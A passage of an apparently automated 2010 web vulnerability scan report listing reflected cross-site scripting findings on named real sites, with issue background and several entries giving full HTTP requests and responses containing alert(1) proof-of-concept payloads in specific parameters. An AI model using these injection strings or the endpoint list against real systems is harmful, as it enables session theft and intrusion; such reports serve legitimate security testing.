1.1219. http://www.wired.com/video/latest-videos/latest/1815816633/tron-legacy--the-payoff/666144939001 [REST URL parameter 2]

1.1220. http://www.wired.com/video/latest-videos/latest/1815816633/tron-legacy--the-payoff/666144939001 [REST URL parameter 3]

1.1221. http://www.wired.com/video/latest-videos/latest/1815816633/tron-legacy--the-payoff/666144939001 [REST URL parameter 3]

1.1222. http://www.wired.com/video/latest-videos/latest/1815816633/tron-legacy--the-payoff/666144939001 [REST URL parameter 4]

1.1223. http://www.wired.com/video/latest-videos/latest/1815816633/tron-legacy--the-payoff/666144939001 [REST URL parameter 5]

1.1224. http://www.wired.com/video/latest-videos/latest/1815816633/tron-legacy--the-payoff/666144939001 [REST URL parameter 6]

1.1225. http://www.wired.com/video/latest-videos/latest/1815816633/tron-legacy-clip-long-time/664849976001 [REST URL parameter 1]

1.1226. http://www.wired.com/video/latest-videos/latest/1815816633/tron-legacy-clip-long-time/664849976001 [REST URL parameter 1]

1.1227. http://www.wired.com/video/latest-videos/latest/1815816633/tron-legacy-clip-long-time/664849976001 [REST URL parameter 2]

1.1228. http://www.wired.com/video/latest-videos/latest/1815816633/tron-legacy-clip-long-time/664849976001 [REST URL parameter 2]

1.1229. http://www.wired.com/video/latest-videos/latest/1815816633/tron-legacy-clip-long-time/664849976001 [REST URL parameter 3]

1.1230. http://www.wired.com/video/latest-videos/latest/1815816633/tron-legacy-clip-long-time/664849976001 [REST URL parameter 3]

1.1231. http://www.wired.com/video/latest-videos/latest/1815816633/tron-legacy-clip-long-time/664849976001 [REST URL parameter 4]

1.1232. http://www.wired.com/video/latest-videos/latest/1815816633/tron-legacy-clip-long-time/664849976001 [REST URL parameter 5]

1.1233. http://www.wired.com/video/latest-videos/latest/1815816633/tron-legacy-clip-long-time/664849976001 [REST URL parameter 6]

1.1234. http://www.wired.com/video/latest-videos/latest/1815816633/tron-legacy-clip-quorra-saves-sam/653193147001 [REST URL parameter 1]

1.1235. http://www.wired.com/video/latest-videos/latest/1815816633/tron-legacy-clip-quorra-saves-sam/653193147001 [REST URL parameter 1]

1.1236. http://www.wired.com/video/latest-videos/latest/1815816633/tron-legacy-clip-quorra-saves-sam/653193147001 [REST URL parameter 2]

1.1237. http://www.wired.com/video/latest-videos/latest/1815816633/tron-legacy-clip-quorra-saves-sam/653193147001 [REST URL parameter 2]

1.1238. http://www.wired.com/video/latest-videos/latest/1815816633/tron-legacy-clip-quorra-saves-sam/653193147001 [REST URL parameter 3]

1.1239. http://www.wired.com/video/latest-videos/latest/1815816633/tron-legacy-clip-quorra-saves-sam/653193147001 [REST URL parameter 3]

1.1240. http://www.wired.com/video/latest-videos/latest/1815816633/tron-legacy-clip-quorra-saves-sam/653193147001 [REST URL parameter 4]

1.1241. http://www.wired.com/video/latest-videos/latest/1815816633/tron-legacy-clip-quorra-saves-sam/653193147001 [REST URL parameter 5]

1.1242. http://www.wired.com/video/latest-videos/latest/1815816633/tron-legacy-clip-quorra-saves-sam/653193147001 [REST URL parameter 6]

1.1243. http://www.wired.com/video/latest-videos/latest/1815816633/wearable-computers-for-soldiers/660701101001 [REST URL parameter 1]

1.1244. http://www.wired.com/video/latest-videos/latest/1815816633/wearable-computers-for-soldiers/660701101001 [REST URL parameter 1]

1.1245. http://www.wired.com/video/latest-videos/latest/1815816633/wearable-computers-for-soldiers/660701101001 [REST URL parameter 2]

1.1246. http://www.wired.com/video/latest-videos/latest/1815816633/wearable-computers-for-soldiers/660701101001 [REST URL parameter 2]

1.1247. http://www.wired.com/video/latest-videos/latest/1815816633/wearable-computers-for-soldiers/660701101001 [REST URL parameter 3]

1.1248. http://www.wired.com/video/latest-videos/latest/1815816633/wearable-computers-for-soldiers/660701101001 [REST URL parameter 3]

1.1249. http://www.wired.com/video/latest-videos/latest/1815816633/wearable-computers-for-soldiers/660701101001 [REST URL parameter 4]

1.1250. http://www.wired.com/video/latest-videos/latest/1815816633/wearable-computers-for-soldiers/660701101001 [REST URL parameter 5]

1.1251. http://www.wired.com/video/latest-videos/latest/1815816633/wearable-computers-for-soldiers/660701101001 [REST URL parameter 6]

1.1252. http://www.wired.com/video/making-the-soundtrack-harry-potter-and-the-deathly-hallows/653378922001 [REST URL parameter 1]

1.1253. http://www.wired.com/video/making-the-soundtrack-harry-potter-and-the-deathly-hallows/653378922001 [REST URL parameter 1]

1.1254. http://www.wired.com/video/making-the-soundtrack-harry-potter-and-the-deathly-hallows/653378922001 [REST URL parameter 2]

1.1255. http://www.wired.com/video/making-the-soundtrack-harry-potter-and-the-deathly-hallows/653378922001 [REST URL parameter 2]

1.1256. http://www.wired.com/video/making-the-soundtrack-harry-potter-and-the-deathly-hallows/653378922001 [REST URL parameter 3]

1.1257. http://www.wired.com/video/making-the-soundtrack-harry-potter-and-the-deathly-hallows/653378922001 [REST URL parameter 3]

1.1258. http://www.wired.com/video/october-madness-meets-sharktoberfest/637752381001 [REST URL parameter 1]

1.1259. http://www.wired.com/video/october-madness-meets-sharktoberfest/637752381001 [REST URL parameter 1]

1.1260. http://www.wired.com/video/october-madness-meets-sharktoberfest/637752381001 [REST URL parameter 2]

1.1261. http://www.wired.com/video/october-madness-meets-sharktoberfest/637752381001 [REST URL parameter 2]

1.1262. http://www.wired.com/video/october-madness-meets-sharktoberfest/637752381001 [REST URL parameter 3]

1.1263. http://www.wired.com/video/october-madness-meets-sharktoberfest/637752381001 [REST URL parameter 3]

1.1264. http://www.wired.com/video/reddit [REST URL parameter 1]

1.1265. http://www.wired.com/video/reddit [REST URL parameter 2]

1.1266. http://www.wired.com/video/reddit [REST URL parameter 2]

1.1267. http://www.wired.com/video/science [REST URL parameter 1]

1.1268. http://www.wired.com/video/science [REST URL parameter 2]

1.1269. http://www.wired.com/video/science [REST URL parameter 2]

1.1270. http://www.wired.com/video/search/ [REST URL parameter 1]

1.1271. http://www.wired.com/video/search/ [REST URL parameter 2]

1.1272. http://www.wired.com/video/search/ [REST URL parameter 2]

1.1273. http://www.wired.com/video/security [REST URL parameter 1]

1.1274. http://www.wired.com/video/security [REST URL parameter 2]

1.1275. http://www.wired.com/video/security [REST URL parameter 2]

1.1276. http://www.wired.com/video/stars-line-up-for-tron-game--evolution/645408465001 [REST URL parameter 1]

1.1277. http://www.wired.com/video/stars-line-up-for-tron-game--evolution/645408465001 [REST URL parameter 1]

1.1278. http://www.wired.com/video/stars-line-up-for-tron-game--evolution/645408465001 [REST URL parameter 2]

1.1279. http://www.wired.com/video/stars-line-up-for-tron-game--evolution/645408465001 [REST URL parameter 2]

1.1280. http://www.wired.com/video/stars-line-up-for-tron-game--evolution/645408465001 [REST URL parameter 3]

1.1281. http://www.wired.com/video/stars-line-up-for-tron-game--evolution/645408465001 [REST URL parameter 3]

1.1282. http://www.wired.com/video/the-casting-of-galaxy-quest/21738564001 [REST URL parameter 1]

1.1283. http://www.wired.com/video/the-casting-of-galaxy-quest/21738564001 [REST URL parameter 1]

1.1284. http://www.wired.com/video/the-casting-of-galaxy-quest/21738564001 [REST URL parameter 2]

1.1285. http://www.wired.com/video/the-casting-of-galaxy-quest/21738564001 [REST URL parameter 2]

1.1286. http://www.wired.com/video/the-casting-of-galaxy-quest/21738564001 [REST URL parameter 3]

1.1287. http://www.wired.com/video/the-casting-of-galaxy-quest/21738564001 [REST URL parameter 3]

1.1288. http://www.wired.com/video/wired-magazine [REST URL parameter 1]

1.1289. http://www.wired.com/video/wired-magazine [REST URL parameter 1]

1.1290. http://www.wired.com/video/wired-magazine [REST URL parameter 2]

1.1291. http://www.wired.com/video/wired-magazine [REST URL parameter 2]

1.1292. http://www.wired.com/wired/coverbrowser/ [REST URL parameter 2]

1.1293. http://www.wired.com/wired/coverbrowser/1993 [REST URL parameter 2]

1.1294. http://www.wired.com/wired/coverbrowser/1993 [REST URL parameter 3]

1.1295. http://www.wired.com/wired/coverbrowser/1994 [REST URL parameter 2]

1.1296. http://www.wired.com/wired/coverbrowser/1994 [REST URL parameter 3]

1.1297. http://www.wired.com/wired/coverbrowser/1995 [REST URL parameter 2]

1.1298. http://www.wired.com/wired/coverbrowser/1995 [REST URL parameter 3]

1.1299. http://www.wired.com/wired/coverbrowser/1996 [REST URL parameter 2]

1.1300. http://www.wired.com/wired/coverbrowser/1996 [REST URL parameter 3]

1.1301. http://www.wired.com/wired/coverbrowser/1997 [REST URL parameter 2]

1.1302. http://www.wired.com/wired/coverbrowser/1997 [REST URL parameter 3]

1.1303. http://www.wired.com/wired/coverbrowser/1998 [REST URL parameter 2]

1.1304. http://www.wired.com/wired/coverbrowser/1998 [REST URL parameter 3]

1.1305. http://www.wired.com/wired/coverbrowser/1999 [REST URL parameter 2]

1.1306. http://www.wired.com/wired/coverbrowser/1999 [REST URL parameter 3]

1.1307. http://www.wired.com/wired/coverbrowser/2000 [REST URL parameter 2]

1.1308. http://www.wired.com/wired/coverbrowser/2000 [REST URL parameter 3]

1.1309. http://www.wired.com/wired/coverbrowser/2001 [REST URL parameter 2]

1.1310. http://www.wired.com/wired/coverbrowser/2001 [REST URL parameter 3]

1.1311. http://www.wired.com/wired/coverbrowser/2002 [REST URL parameter 2]

1.1312. http://www.wired.com/wired/coverbrowser/2002 [REST URL parameter 3]

1.1313. http://www.wired.com/wired/coverbrowser/2003 [REST URL parameter 2]

1.1314. http://www.wired.com/wired/coverbrowser/2003 [REST URL parameter 3]

1.1315. http://www.wired.com/wired/coverbrowser/2004 [REST URL parameter 2]

1.1316. http://www.wired.com/wired/coverbrowser/2004 [REST URL parameter 3]

1.1317. http://www.wired.com/wired/coverbrowser/2005 [REST URL parameter 2]

1.1318. http://www.wired.com/wired/coverbrowser/2005 [REST URL parameter 3]

1.1319. http://www.wired.com/wired/coverbrowser/2006 [REST URL parameter 2]

1.1320. http://www.wired.com/wired/coverbrowser/2006 [REST URL parameter 3]

1.1321. http://www.wired.com/wired/coverbrowser/2007 [REST URL parameter 2]

1.1322. http://www.wired.com/wired/coverbrowser/2007 [REST URL parameter 3]

1.1323. http://www.wired.com/wired/coverbrowser/2008 [REST URL parameter 2]

1.1324. http://www.wired.com/wired/coverbrowser/2008 [REST URL parameter 3]

1.1325. http://www.wired.com/wired/coverbrowser/2009 [REST URL parameter 2]

1.1326. http://www.wired.com/wired/coverbrowser/2009 [REST URL parameter 3]

1.1327. http://www.wired.com/wired/issue/15-06/ [REST URL parameter 2]

1.1328. http://www.wired.com/wired/issue/15-06/ [REST URL parameter 3]

1.1329. http://www.wired.com/wired/issue/15-07/ [REST URL parameter 2]

1.1330. http://www.wired.com/wired/issue/15-07/ [REST URL parameter 3]

1.1331. http://www.wired.com/wired/issue/15-08/ [REST URL parameter 2]

1.1332. http://www.wired.com/wired/issue/15-08/ [REST URL parameter 3]

1.1333. http://www.wired.com/wired/issue/15-09/ [REST URL parameter 2]

1.1334. http://www.wired.com/wired/issue/15-09/ [REST URL parameter 3]

1.1335. http://www.wired.com/wired/issue/15-10/ [REST URL parameter 2]

1.1336. http://www.wired.com/wired/issue/15-10/ [REST URL parameter 3]

1.1337. http://www.wired.com/wired/issue/15-11/ [REST URL parameter 2]

1.1338. http://www.wired.com/wired/issue/15-11/ [REST URL parameter 3]

1.1339. http://www.wired.com/wired/issue/15-12/ [REST URL parameter 2]

1.1340. http://www.wired.com/wired/issue/15-12/ [REST URL parameter 3]

1.1341. http://www.wired.com/wired/issue/16-01/ [REST URL parameter 2]

1.1342. http://www.wired.com/wired/issue/16-01/ [REST URL parameter 3]

1.1343. http://www.wired.com/wired/issue/16-02/ [REST URL parameter 2]

1.1344. http://www.wired.com/wired/issue/16-02/ [REST URL parameter 3]

1.1345. http://www.wired.com/wired/issue/16-03/ [REST URL parameter 2]

1.1346. http://www.wired.com/wired/issue/16-03/ [REST URL parameter 3]

1.1347. http://www.wired.com/wired/issue/16-04/ [REST URL parameter 2]

1.1348. http://www.wired.com/wired/issue/16-04/ [REST URL parameter 3]

1.1349. http://www.wired.com/wired/issue/16-05/ [REST URL parameter 2]

1.1350. http://www.wired.com/wired/issue/16-05/ [REST URL parameter 3]

1.1351. http://www.wired.com/wired/issue/16-06 [REST URL parameter 2]

1.1352. http://www.wired.com/wired/issue/16-06 [REST URL parameter 3]

1.1353. http://www.wired.com/wired/issue/16-07 [REST URL parameter 2]

1.1354. http://www.wired.com/wired/issue/16-07 [REST URL parameter 3]

1.1355. http://www.wired.com/wired/issue/16-08 [REST URL parameter 2]

1.1356. http://www.wired.com/wired/issue/16-08 [REST URL parameter 3]

1.1357. http://www.wired.com/wired/issue/16-09 [REST URL parameter 2]

1.1358. http://www.wired.com/wired/issue/16-09 [REST URL parameter 3]

1.1359. http://www.wired.com/wired/issue/16-10 [REST URL parameter 2]

1.1360. http://www.wired.com/wired/issue/16-10 [REST URL parameter 3]

1.1361. http://www.wired.com/wired/issue/16-11 [REST URL parameter 2]

1.1362. http://www.wired.com/wired/issue/16-11 [REST URL parameter 3]

1.1363. http://www.wired.com/wired/issue/16-12 [REST URL parameter 2]

1.1364. http://www.wired.com/wired/issue/16-12 [REST URL parameter 3]

1.1365. http://www.wired.com/wired/issue/17-01 [REST URL parameter 2]

1.1366. http://www.wired.com/wired/issue/17-01 [REST URL parameter 3]

1.1367. http://www.wired.com/wired/issue/17-02 [REST URL parameter 2]

1.1368. http://www.wired.com/wired/issue/17-02 [REST URL parameter 3]

1.1369. http://www.wired.com/wired/issue/17-03 [REST URL parameter 2]

1.1370. http://www.wired.com/wired/issue/17-03 [REST URL parameter 3]

1.1371. http://www.wired.com/wired/issue/17-04 [REST URL parameter 2]

1.1372. http://www.wired.com/wired/issue/17-04 [REST URL parameter 3]

1.1373. http://www.wired.com/wired/issue/17-05 [REST URL parameter 2]

1.1374. http://www.wired.com/wired/issue/17-05 [REST URL parameter 3]

1.1375. http://www.wired.com/wired/issue/17-06 [REST URL parameter 2]

1.1376. http://www.wired.com/wired/issue/17-06 [REST URL parameter 3]

1.1377. http://www.wired.com/wired/issue/17-07 [REST URL parameter 2]

1.1378. http://www.wired.com/wired/issue/17-07 [REST URL parameter 3]

1.1379. http://www.wired.com/wired/issue/17-08 [REST URL parameter 2]

1.1380. http://www.wired.com/wired/issue/17-08 [REST URL parameter 3]

1.1381. http://www.wired.com/wired/issue/17-09 [REST URL parameter 2]

1.1382. http://www.wired.com/wired/issue/17-09 [REST URL parameter 3]

1.1383. http://www.wired.com/wired/issue/17-10 [REST URL parameter 2]

1.1384. http://www.wired.com/wired/issue/17-10 [REST URL parameter 3]

1.1385. http://www.wired.com/wired/issue/geekipedia [REST URL parameter 2]

1.1386. http://www.wired.com/wired/issue/geekipedia [REST URL parameter 3]

1.1387. http://www.wired.com/wired/issue/test2007/ [REST URL parameter 2]

1.1388. http://www.wired.com/wired/issue/test2007/ [REST URL parameter 3]

1.1389. http://www.wisegeek.com/who-is-ferdinand-marcos.htm [REST URL parameter 1]

1.1390. http://www.wisegeek.com/who-is-ferdinand-marcos.htm [name of an arbitrarily supplied request parameter]

1.1391. http://www.wisegeek.com/who-is-ferdinand-marcos.htm [name of an arbitrarily supplied request parameter]

1.1392. http://www.xml.com/pub/a/2003/07/23/extendingrss.html [name of an arbitrarily supplied request parameter]

1.1393. http://www.xml.com/pub/a/2003/07/23/extendingrss.html [name of an arbitrarily supplied request parameter]

1.1394. http://www.zdnet.com/blog/computers/micro-center-beats-intels-deal-offers-its-64gb-ssd-for-just-9999-/4283 [REST URL parameter 4]

1.1395. http://www.zdnet.com/blog/microsoft/rss [REST URL parameter 3]

1.1396. http://www.zdnet.com/search [REST URL parameter 1]

1.1397. http://www2.colum.edu/course_descriptions/52-3804.html [REST URL parameter 1]

1.1398. http://www2.colum.edu/course_descriptions/52-3804.html [REST URL parameter 1]

1.1399. http://www2.colum.edu/course_descriptions/52-3804.html [REST URL parameter 2]

1.1400. http://autos.aol.com/ [Referer HTTP header]

1.1401. http://newsroom.accenture.com/article_display.cfm [Referer HTTP header]

1.1402. http://www.accenture.com/Accenture/Templates/WidescreenNavigationTemplate.aspx [Referer HTTP header]

1.1403. http://www.accenture.com/accenture/search/search.aspx [Referer HTTP header]

1.1404. https://www.accenture.com/Accenture/Registration/EAN.aspx [Referer HTTP header]

1.1405. https://www.accenture.com/Accenture/Registration/GenericTemplate.aspx [Referer HTTP header]

1.1406. https://www.accenture.com/Accenture/Registration/IMFormTemplate.aspx [Referer HTTP header]

1.1407. https://www.accenture.com/Accenture/Registration/LoginPage.aspx [Referer HTTP header]

1.1408. https://www.accenture.com/Accenture/Registration/SendPassword.aspx [Referer HTTP header]

1.1409. https://www.accenture.com/Accenture/Registration/SignOutPage.aspx [Referer HTTP header]

1.1410. https://www.accenture.com/Global/Registration/Email_This.htm [Referer HTTP header]

1.1411. https://www.accenture.com/Global/Registration/FeedbackForm.htm [Referer HTTP header]

1.1412. https://www.accenture.com/Global/Registration/MailTo.htm [Referer HTTP header]

1.1413. https://www.accenture.com/Global/Registration/Personalization [Referer HTTP header]

1.1414. https://www.accenture.com/Global/Registration/RequestServices.htm [Referer HTTP header]

1.1415. https://www.accenture.com/accenture/registration/PrintThis.aspx [Referer HTTP header]

1.1416. https://www.accenture.com/accenture/registration/PrintThis.aspx [Referer HTTP header]

1.1417. https://www.accenture.com/global/registration/careerssample [Referer HTTP header]

1.1418. http://www.addthis.com/bookmark.php [Referer HTTP header]

1.1419. http://www.addthis.com/bookmark.php [Referer HTTP header]

1.1420. http://www.pollingplacephotoproject.org/ [User-Agent HTTP header]

1.1421. http://www.salesforce.com/servlet/servlet.WebToLead [Referer HTTP header]

1.1422. https://www.salesforce.com/servlet/servlet.WebToLead [Referer HTTP header]

1.1423. http://www.webwag.com/wwgthis.php [Referer HTTP header]

1.1424. http://www.windowsfordevices.com/ [Referer HTTP header]

1.1425. http://www.zazzle.com/geekdad_mug-168641877038204487 [Referer HTTP header]

1.1426. http://www.zazzle.com/geekdad_mug-168641877038204487 [Referer HTTP header]

1.1427. http://www.zdnet.com/ [Referer HTTP header]

1.1428. http://www.zdnet.com/blog/computers/micro-center-beats-intels-deal-offers-its-64gb-ssd-for-just-9999-/4283 [Referer HTTP header]

1.1429. http://www.zdnet.com/blog/computers/micro-center-beats-intels-deal-offers-its-64gb-ssd-for-just-9999-/4283 [Referer HTTP header]

1.1430. http://www.zdnet.com/search [Referer HTTP header]

1.1431. http://www.zdnet.com/search [Referer HTTP header]

1.1432. http://click.linksynergy.com/fs-bin/click [RD_PARM1 parameter]

1.1433. http://click.linksynergy.com/fs-bin/click [RD_PARM1 parameter]

1.1434. http://www.accenture.com/Accenture/Registration/EAN.aspx [REST URL parameter 3]

1.1435. http://www.accenture.com/Accenture/Registration/LoginPage.aspx [REST URL parameter 3]

1.1436. http://www.accenture.com/Accenture/Registration/SignOutPage.aspx [REST URL parameter 1]

1.1437. http://www.accenture.com/Accenture/Registration/SignOutPage.aspx [REST URL parameter 2]

1.1438. http://www.accenture.com/Accenture/Registration/SignOutPage.aspx [REST URL parameter 3]



1. Cross-site scripting (reflected)
There are 1438 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. https://4qinvite.4q.iperceptions.com/1.aspx [sdfc parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://4qinvite.4q.iperceptions.com
Path:   /1.aspx

Issue detail

The value of the sdfc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 23d3f'-alert(1)-'3687970a447 was submitted in the sdfc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /1.aspx?sdfc=299f610e-24038-38153450-25fe-438c-8517-2aca3243ff7523d3f'-alert(1)-'3687970a447&lID=1&loc=4Q-WEB2 HTTP/1.1
Host: 4qinvite.4q.iperceptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 21 Nov 2010 17:17:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Srv-By: 4Q-INVITE2
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=auwb01i1a2g3ks3mlhwi5jmt; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 1089

var sID= '24038'; var sC= 'IPE24038'; var brow= 'IE'; var vers= '7.0'; var lID= '1'; var loc= '4Q-WEB2'; var ps= 'sdfc=299f610e-24038-38153450-25fe-438c-8517-2aca3243ff7523d3f'-alert(1)-'3687970a447&lID=1&loc=4Q-WEB2';var sGA='';function setupGA(url) { return url;}var tC= 'IPEt'; var tCv='?'; CCook(tC,tC,0); tCv= GetC(tC);if (GetC(sC)==null && tCv != null) {CCook(sC,sC,30); Ld();} DCook(tC);funct
...[SNIP]...

1.2. http://ad.vulnerable.ad.partner/adi/N5295.150723.CBSI/B4885922 [b parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N5295.150723.CBSI/B4885922

Issue detail

The value of the b request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 956a5"-alert(1)-"417ab19093e was submitted in the b parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5295.150723.CBSI/B4885922;sz=300x250;click0=http://adlog.com.com/adlog/e/r=8024&sg=476619&o=10784%253a27080%253aB245%253a9733575%253a&h=cn&p=2&b=5956a5"-alert(1)-"417ab19093e&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/;ord=2010.11.21.21.24.20? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://news.cnet.com/8301-27080_3-20012253-245.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:05:53 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6913

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu Aug 19 07:11:31 EDT 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
/181/%2a/z%3B231241976%3B1-0%3B0%3B55844876%3B4307-300/250%3B38009999/38027756/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8024&sg=476619&o=10784%253a27080%253aB245%253a9733575%253a&h=cn&p=2&b=5956a5"-alert(1)-"417ab19093e&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0
...[SNIP]...

1.3. http://ad.vulnerable.ad.partner/adi/N5295.150723.CBSI/B4885922 [cid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N5295.150723.CBSI/B4885922

Issue detail

The value of the cid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6f470"-alert(1)-"d3cac9a52e0 was submitted in the cid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5295.150723.CBSI/B4885922;sz=300x250;click0=http://adlog.com.com/adlog/e/r=8024&sg=476619&o=10784%253a27080%253aB245%253a9733575%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=200122536f470"-alert(1)-"d3cac9a52e0&pp=100&e=3&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/;ord=2010.11.21.21.24.20? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://news.cnet.com/8301-27080_3-20012253-245.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:09:34 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6913

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu Aug 19 07:12:10 EDT 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
-300/250%3B38010001/38027758/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8024&sg=476619&o=10784%253a27080%253aB245%253a9733575%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=200122536f470"-alert(1)-"d3cac9a52e0&pp=100&e=3&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event
...[SNIP]...

1.4. http://ad.vulnerable.ad.partner/adi/N5295.150723.CBSI/B4885922 [count parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N5295.150723.CBSI/B4885922

Issue detail

The value of the count request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9600a"-alert(1)-"d571cc2dd60 was submitted in the count parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5295.150723.CBSI/B4885922;sz=300x250;click0=http://adlog.com.com/adlog/e/r=8024&sg=476619&o=10784%253a27080%253aB245%253a9733575%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=9600a"-alert(1)-"d571cc2dd60&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/;ord=2010.11.21.21.24.20? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://news.cnet.com/8301-27080_3-20012253-245.html
Accept-Language: en-US
